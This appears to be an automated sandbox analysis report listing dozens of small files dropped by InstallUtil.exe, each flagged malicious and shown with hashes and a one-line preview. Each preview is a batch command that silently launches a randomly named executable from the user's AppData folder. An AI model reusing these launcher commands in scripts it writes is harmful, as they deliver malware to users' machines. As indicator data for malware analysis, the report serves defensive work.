                                                                                                                                                                                                                                SHA-512:FD3C92A3BBD93AFF65BDC8B25CFE0B34446F690580836723DC3FFB9CA3D33CFF0CC4F0C7B12E2EA4B1F2C1EF580F768FDE676A8A7811BA5C13E1A8A2B51CA564
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UMNq6JQCwcuFbKEJ00C7NaNb.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.043539769019267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5v66lfEtJln:fE1wkn23zlML
                                                                                                                                                                                                                                MD5:A5F2C9214063F64983F7EB1B173A0DAF
                                                                                                                                                                                                                                SHA1:F698FBDB1FA776E2E2CFAC1B637581455F005AE3
                                                                                                                                                                                                                                SHA-256:A7E85B26BAF1B5F2208A0F5E6094EC755A58B4985BB126C757D0B1F493031A10
                                                                                                                                                                                                                                SHA-512:1D1AE4AE8C76D990B1CCD259AB0F9AD62D484E8BE7FDAFE0C9D0C96D97354959939DDE56272CB1C4004C93F7CA0C1AB67E169450B5A24141181813E468F3C225
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JRoV34kN30OEKUZzqqQMQIaH.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515983
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5nDRB2DKR9Sy4Al:fE1wkn23lB8Ul
                                                                                                                                                                                                                                MD5:FE91D1368AB7661C3AADFE27ADF8E5B6
                                                                                                                                                                                                                                SHA1:DE81290272DD342203037E4566CE07A27DBAC435
                                                                                                                                                                                                                                SHA-256:959791F47B32DD0FB4E776D3305604A3956EBE2CCA1BE192BB535BA3520BF853
                                                                                                                                                                                                                                SHA-512:E8C9EC7CB68A1DA3F5D85ADF4D73E8AAB04B9D123D522525F54FFECAFB38CD5A93B3F3A873D4ED6101365F75706C42228416F6D832CBC9C52E0B9D7CEAF235A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Bm6HEFHdCdk8uoOOXBbmJVrU.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098062
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5OVXdvwNfJQerAsn:fE1wkn23O96Gc
                                                                                                                                                                                                                                MD5:9644EE55FAAC23F910F78E63B4972862
                                                                                                                                                                                                                                SHA1:0D30270D8BFE0F3CE8431387A9E77B647038A434
                                                                                                                                                                                                                                SHA-256:850E8DB5F1D4948E37F390A0A8DE2A71A6F4F56393D19082A18F0197DF751CB8
                                                                                                                                                                                                                                SHA-512:1C3280BAB094B0BE09BA290613D4D4B5B900BC1BA3973DB3C1B3EC212CA6077C8578C0D7BE30C32F5EC50467421DFED7760082803FF3F51B88EFBEBF9003D8B9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kp2OCJt3hMg8nOfiV855IC6b.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515984
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WYSZGd0cPhhZHL:fE1wkn23W/mhZHL
                                                                                                                                                                                                                                MD5:2A5F2556D258A184BEF609CE376EF161
                                                                                                                                                                                                                                SHA1:0A8836D9A7B0E5835AAB859A4C19DBD65603BD7E
                                                                                                                                                                                                                                SHA-256:A46700B0193B132E2FCAFEDA0F5EF2ADA92C8BBAA9B3B5927865753F35D40A16
                                                                                                                                                                                                                                SHA-512:2B531605D22CEA71DA72198AF06B5EF8B232B69C431313D38523DAF9CF977DDD6020A1FF5BE4014F08F197D90518EE4EA5862C93E322001F7BC1DB4195AF52F7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3Dkw4ZNwPrQyjD2TIlPKqqcu.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.88622450855154
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CbsItSnI0dAHF:fE1wkn23CbbrL
                                                                                                                                                                                                                                MD5:2E76D9FE260E65A1047F206025D89615
                                                                                                                                                                                                                                SHA1:1CF7BD71F3D9EDBEA8DE8EF936425E01F7223DEE
                                                                                                                                                                                                                                SHA-256:69DFA04443689248C3FD49DB54AF0101F94518C3780C96AF0112E5A1C0AD1DF6
                                                                                                                                                                                                                                SHA-512:3D6591695278704EFB628C54C0923D84F40D80575A73F9F0E44FD237E1E7F695642DB608DCEA72223875D7FD5F2E5EA9079BC6B3A96DC44DA26BDFA18C2BDE5B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gYoelXOXnR67v6k5aVRTdw5t.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
Size (bytes):69
Entropy (8bit):4.939985464269607
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5XNmBdsPLYiFn:fE1wkn23dmbsPLP
MD5:AA3FD67681EC980B4077440B365AECAC
SHA1:3BDD8B838364FDB0805CFF6385074FF0D33F529D
SHA-256:0BCA8EC60F0C617BDA0B0D4EB4283EA9A7B14C9F8934C7C6A6554BB5C7E6C354
SHA-512:36C92F08BE7EF4CC4B8374A4B3783B54E93B07ADF5237E4CAA886DD54D342D747EA5687C02058F7FA20A4B983656226A1CE437BF237347A0F99D6190EE8D79E2
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\rpBCc3ylG3nivVIH9WHFRiU0.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.967523645862218
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5vH8QG+lXv4As:fE1wkn230T+94v
MD5:D94A3CAF985FFDEA4F948C21D68271EE
SHA1:9148B06E0850A289F6EA8F283B52398C7846693C
SHA-256:FB29C7BD40789C23FA4BCD62FC97E62561E0D768CEACCB3D5ACD6A73C84FC050
SHA-512:A6017BC83B1A4DFDAC32DB4F0FC3D535F9C57922F0653B45895CA9D650B28450282FDDACD9BE4D19F287BB77682B3A9DBBD2705B7E384F4CFB714867A0C0A410
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\Ju6O9RRnwY5cmyJE9vtS2Jgt.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.026941986008737
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5zZE+09xdjOhL4Al:fE1wkn231E24m
MD5:6C8D68086F1F472C158628D8D885BB9D
SHA1:AC449315694BB599EF47325FB409F91326C1E979
SHA-256:9D1611E2399C2ACC5F5EF376CCA4452D12E3D07E437314459EF33E47DB76DC35
SHA-512:3F7DF05FCAACA2067CC3F482B15E9142EDA859F8D63F061721E872A0A9EF567FAF32216F2EC81759BD53F811B3E6D2732210A3CF74DDB2F66C2C153585F4DFA2
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\VMOLwRqqIQXTJzWKrLXkyRQ8.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.766446791066171
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5hBxW2L0uEAJC0FCHF:fE1wkn23XxW2ouE/N
MD5:559A9069C4B0A288723A0A067A1A9FE0
SHA1:ABE2EA38A244C08864A3EE4EFAC01ADEF8A19804
SHA-256:FE44790ED94424378B8FADA7E3CE1C458D2FAF59615E9BFF392C1304EAFDD221
SHA-512:D5F52CC034EF7CB6584EA21D6ABF4F8E98F51A333D02B2E510A08F74A344D3F6E2D0E762168A74468D8F1888A9AE51963D27AF9AD985DF09148006980AAE178E
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\DdT3rCn1HYZaeiTB6islHQa6.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.900059558441151
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J50sXFUdXrs7X0diFn:fE1wkn230s1mw7ks
MD5:0EC4F43A7995DBB178925C037AA44E79
SHA1:3E59FF3D9AD12ADEBB89A40FDFA3272F5FE3F451
SHA-256:D6BD1E9185D726F126D6FC1CF471B1F2F674576D91F8970A3E26FD4982A14B4C
SHA-512:988DC43A2808BAC1AF454C620EF0BDB66CFBB31AD882899B749F880EAD5316457AFF64FDC94B83F8C45525C590128769907B4D7CF6DAA8A6812A55D27DFB5420
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\QIr2p18CO0NWQIPJWCtoKG30.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.922314725880133
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5/2CH8gUjVjs:fE1wkn239cgOs
MD5:6D8C5D9B665E70A0FE90FBDD95D48691
SHA1:B33F248C22793E66EF17FFAB108449F30DE15E74
SHA-256:5354D5B022D131A67AC7143810981DFEA12D0EA14D0BC6993974FF0FE0E1895E
SHA-512:3BAA29BC439774B6A79E57E6A9D3BFB9CE21DB18103069DAB89CAA9D59C7B5AE9C8367FF1BAB1AA72CF524F44DE424BEEA46937849A3E748884762346DD5F351
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\Za9YgbYvsobCQHROGG56LpJy.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.019837275926519
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5By9BWaEN8vcsYiF:fE1wkn23t8EBiF
MD5:6E30BE121743B691132EAB302DB20260
SHA1:2613CC86915E444C189F9686384D24DB9D5CBB50
SHA-256:04EC5831F1FF0217378D33E04766FA783B78CF21116FA912989E4318C504159C
SHA-512:8643CE721A6F1666BD88AC11447988B3B7914952BD3E5A88C2DFA46045BEA50A807D34D2C326A9342E2FFA39313B81B0D65604C6C56DCAE1869ED991C940FF87
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\dWXd3iKvKIXWjmhGzJ9IYi7c.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.03479278622115
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5WURkR2GqSHykdan:fE1wkn23WI1GPSD
MD5:5EA035B9D7A5511C1AE58A6C54332FDF
SHA1:D3E8D2D94B20887029CB7BCA09AFDBC5B1A0C731
SHA-256:6CD22C677A739EC50564C3398DA6952A44468961C72D1172C1F02D3E1D7E38D2
SHA-512:5D5BF0D5574F8F06B06EB4DE50F62F0A3C2A2AE973D94F7EECD3D314DF7C1252B6A1CCCD94CC731012942F4F1AED316B59206834FD72B8529F5329FCE4074F8D
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.066867891837193
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5O/HwUHCLAdAl:fE1wkn23O/HHC0dm
MD5:4656A53D32145984D67BF4BFD5B57F02
SHA1:CAFC6E26872980E6F3DA074F21E2DC77F843C66D
SHA-256:D0CC6F6F9BF397277E9F5A8CFB281937976B83260855209B20165CF230A399FD
SHA-512:5DE64495051544BBF38B5A87A00C4BC419711B67374383BB06B23B80D28B1A1C17B10EE343A433ADB9D484D01232CCC55B658F6BD702E54C9A1B8C3232972BCB
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\kWI9BKuDjwJM7B5NwPk2GzgD.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.835358204141004
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SmOc9fooxHL:fE1wkn23SM1p
MD5:E547A67A169F799B28CCB0812062A8B4
SHA1:7327002FA7F022DAA8C505585E4218FD51674383
SHA-256:525E37C0E19C6A38012EA719D92143AC5F28A337BBB20A1302F57D0F08739EA4
SHA-512:A8E2E5CB9F53234972890AFD2412BE0C55CF44F0A100AFA8B4A114A5F1CEA9181C7F31A78460E8F1F43CF1BED943E9A6609D42FBB0E69087B7D18B11C2BE5E64
Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\77pRyJyaqlt2sZMToC1r94jB.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.915210015797916
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5NtkbHjLGOBAs:fE1wkn23/A8s
                                                                                                                                                                                                                                MD5:346EF1127D82F41ED8DC227B6127906A
                                                                                                                                                                                                                                SHA1:26906982A615F0CC254A9520CB6A5BE255CC8824
                                                                                                                                                                                                                                SHA-256:AE666819A3D5E6A676EC676BA8B63D974BB00D8F22F00ACF268037CAEF43C3BC
                                                                                                                                                                                                                                SHA-512:7810AB839DA81D7AB9BD0CB97C73E3E383E1F2219FC3FC532BE914F89FB8D9D5A0345F42A549AF2B56A33FFE08B912154CD23587987BB142B6EEF1143BF8F529
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hHAgXlOl44R75PdcNtQ5s8e3.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.795057928037724
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rVVhuGELfwmcCl:fE1wkn23ZVhu99cCl
                                                                                                                                                                                                                                MD5:81524046539FDF41CE104F4BFC4DE6B6
                                                                                                                                                                                                                                SHA1:44A67A89578BE91F413223A8BB288554A2A029A0
                                                                                                                                                                                                                                SHA-256:F6B7481B8C366CB0C3250678635550367478336076A589ED06080E743ACB2DC2
                                                                                                                                                                                                                                SHA-512:DB53B90512C6A19B3270B23887AE26E222DA427D039150429C74B80475EF355F23A75899B85484DF890ECC1274439D0EBB468DEAB027D90F09857A3C44B0710A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NRQOltVD0acQXnzUvV0AHMDa.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098064
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5GMT8HP0sn:fE1wkn23GMqT
                                                                                                                                                                                                                                MD5:01365B8397F67D146D624CF9C4130D39
                                                                                                                                                                                                                                SHA1:58334D23FB992F7E53BC13BBE139E7A89C75BC99
                                                                                                                                                                                                                                SHA-256:A1CF256364035D20E58E28C46252AEE05759796210C36C3355669DAE2117F321
                                                                                                                                                                                                                                SHA-512:2B0A13430E846C0A021A09960D1E71CC57D4117C8FFBE812B672A67F13C9CE957EBCC89D5437F45D3210B98E293E45C41CCC8F3861A638F6F5127C75F745B8FB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\cBFvqvrl6uXFbTB4JYYj3iX2.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098062
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WbkyLQ9fnu0CHF:fE1wkn23WIfnsHF
                                                                                                                                                                                                                                MD5:730B3AAD03243133F01CC924C2892CF5
                                                                                                                                                                                                                                SHA1:577378B585BE8C46797ACD1BDDD5B26C5783D7AC
                                                                                                                                                                                                                                SHA-256:5D8CFA0010E09728376F51D30B07C81A99CD9486F3A32D4E8E22A39C3C585A1D
                                                                                                                                                                                                                                SHA-512:172CFD8FD1F65B0DAC05BF1BF2533C2A5ED9C17CD63CFB272572B2AFC1495B182DDD6AF9AC64AEBE05FE014E3291B3FD1DCD0BF06A5681CAF0DB102960F7FCA0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3MdVqnAjjJf11QnuXHbMYjzK.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.882014449776854
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DDqwNOJHFn:fE1wkn23Hqwul
                                                                                                                                                                                                                                MD5:7E4A2B9689CBD5AB65D1416CC7047888
                                                                                                                                                                                                                                SHA1:21A13F14872173E5109AC6C589849877BFD0A7BF
                                                                                                                                                                                                                                SHA-256:EF90D7ADD294D840DF19308722D70E55FE9F3D4270A0592FDB434C9F543F4A04
                                                                                                                                                                                                                                SHA-512:9F1E14D435A901514E6A887C92E4BFFFE8CF9D348F370FBB3465193DCEF9C818ED04D627BF13F1A40315BCBC485BEE5C604AE42DE0937904AA98964E57CEC035
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\faO2uzdAaG1P228qHtBBLcZH.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.997956478762361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5dxSgskLVCSkpDUW:fE1wkn23z5LVRkpDP
                                                                                                                                                                                                                                MD5:8E525CA955502A90975CCCB51F6E1194
                                                                                                                                                                                                                                SHA1:AF268BC90DC49614341888E1D0BD966B2CA09C9D
                                                                                                                                                                                                                                SHA-256:2271146DCC37C2D9632441D1E6885E293052126CEA4E043CDADCA714DB09285F
                                                                                                                                                                                                                                SHA-512:9ADC8A1DF701FEAE70B8671D1439135B41DC71EA5806D7E73271966ACEB8E1F613FAFD1BAFFF047251D4173DD6A159708E2C48967CF37961CCEDA6A6010EEE39
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8T7EILlANzGG35y6DwATJf1o.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.037882384590816
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5BvyifsOSAOKLvn:fE1wkn23ZwOSjKL
                                                                                                                                                                                                                                MD5:3C85C4A74D1CC61C6AC82941ABDB5C07
                                                                                                                                                                                                                                SHA1:75CF15C8926EF68FB715DE792EA91D484172C345
                                                                                                                                                                                                                                SHA-256:254016A81AA3746AA6D360BEB6047190B8C878D729C19ECB07F7728FC16CF1A2
                                                                                                                                                                                                                                SHA-512:65A8F679D62C26EA59C61674C9F0F61496FB9EC03A279BA30FB3E5E0F2C288AF622F74A480AD8624AA6CBDC07443269F5371D5E9961F06B94A66E70B40D636ED
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\dJWgkx2NkzIq27ZmDKfJlJSb.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
Size (bytes):69
Entropy (8bit):4.958030572933904
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5PdZ0C8hri2PkAHF:fE1wkn23VT2Pkm
MD5:73A5F40CE9E4C5CBDC0533ABF03EE6BA
SHA1:7636BA6A6A5F7DAFB3B638D384F5E063775441ED
SHA-256:D7703D43424CAF01D3A883AB430F07603A211969F249C097DED79922642C0DBF
SHA-512:AF8DCCF2110C361DB12814AFEBE59194A5BC8A9B93B21CFDE5A262B8869CE0BC9BB8E04C8A9F0E1E80EFFA84C96EDBBB907AE5989B27FCDD51D6F8C8E69F9D85
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\jum4cD5QgYDb9AipfhKNG4uj.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.80926734820216
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5xLpy5JHF:fE1wkn23Npy3l
MD5:9798BD8D0B2B7DE06953F1BD10272A7F
SHA1:F932BB0A0471391311E63615B8111FE2A30EF1E0
SHA-256:3B2115607BD66CD4A2646CF9907D9C1866F5C9586B516C2ECD42E355A271D849
SHA-512:C43E8EAABAA22668A1F00C1A81CC2DDCC82D60467FE2F415AF32676CA73F61A482F8875C17296A56C024BC9C8D4226D0F6E5EF6FAEBFFD34C7688AA4AB389CF6
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\TnWsoNZIfxfOxOyjMDzsjp4X.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.025494660354971
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J52HfcIOQ4MCHF:fE1wkn232H0i4MEF
MD5:3DE01D2DA8E03FBEF35D602806E90D4D
SHA1:28D59402F0BE40C6BF23BC7C26F4F1918370AD78
SHA-256:2819E6DDF69DBBC8D40110542434E5A79FDDAABD9813EB30EA9278DAFA134FFF
SHA-512:2211EEC106BEB25D82C0B23656B8C82269F338E36758828C1D6B9AC8592BAE91353DBC959BFFF56732FC308CDDE48970653643959732D059355D8DFE7BACE8DC
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\SSEzfyhdmFgId4wuINTHaAmw.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.037882384590816
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J53VBDpZ3DnVql:fE1wkn23FBD7DnVql
MD5:3779F1C772FE91DBBC9875BA481E90CE
SHA1:2A69AA2A31E89C4FEE79B2555B7B82496E2C732B
SHA-256:AAED85A50D7E33FEAAACC803E05C8BD0C3E6FF333B3BB06BCD8F7AE6C49123BE
SHA-512:11CCFCF059225B5FE54A351747BBEB3040010B82FF6C712CB17B34211679E98017F1F8C43C9BD10F8CFCDDC0A2EBCDB2ECE9643B22BE6911D204AE8845C51180
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\RjS1Nhdf06REy5J9bfLmGhpU.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.030742475370033
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5WIQYTlWxkdan:fE1wkn23WIQ7xD
MD5:F705DB1B5329FE5AC05E6C9B130B0DCB
SHA1:BFEA175F219404174279986E38B61B8D9030D43A
SHA-256:B0602DA9E7197537733A4B7EBB5618FCC40E8B7964B515C8B504D68EA370AE88
SHA-512:D212130C5F4E49A30A7A61483F1A597C97FCAEABE04246E866EEA996BDBFF41927F8DF636132BE1FBF8A723E983AD0CB563E1208BF4F074DE285E2B47900A005
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\3m556AQE7tDOPkLnbR8jRGPu.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.858686326958929
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5DML8I1GGLAEF:fE1wkn23Md1zLv
MD5:FE0EA9265D69FF07D93F2D7085F58DEB
SHA1:B45BC1AECF7D93231B30D993E14FFFD96BE91617
SHA-256:1933F32307755D343EE27DC2F33E93EB6C49F41024201CB9E571496B66521956
SHA-512:07FAFBE63D1658603ABE2119E14D5DF7B08B765D01A24AEFB27B0F97EA4635AC42C0FCF7F6870A49F5D769729883C7D874B0948BBA9805BE6809AF3F27DACFFC
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\flgUFRxMTOax9vom3NLtvcuv.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.037882384590815
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5cFykTR8diF:fE1wkn23cFyWF
MD5:F0DC450980D9CEA90E64F17965B710D1
SHA1:4C8E433F193A3BB0FE7797B7EE350BF8B3A896B9
SHA-256:8003A1CD4F93A495DF7EC750342FBF598865520A9A1BB4BB3716D929F191FE7F
SHA-512:8D7AD974C0D92007E8B88394384C7C2180CBB64C272A9E01E168EA949429D7DF17B3D0CBB6F4ACA4D4174A99723C6D04EEABCBCEDCBB894CF839D03316C8A3C6
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\94MOPbtk8fV3QmrVJFZPX8uo.exe"

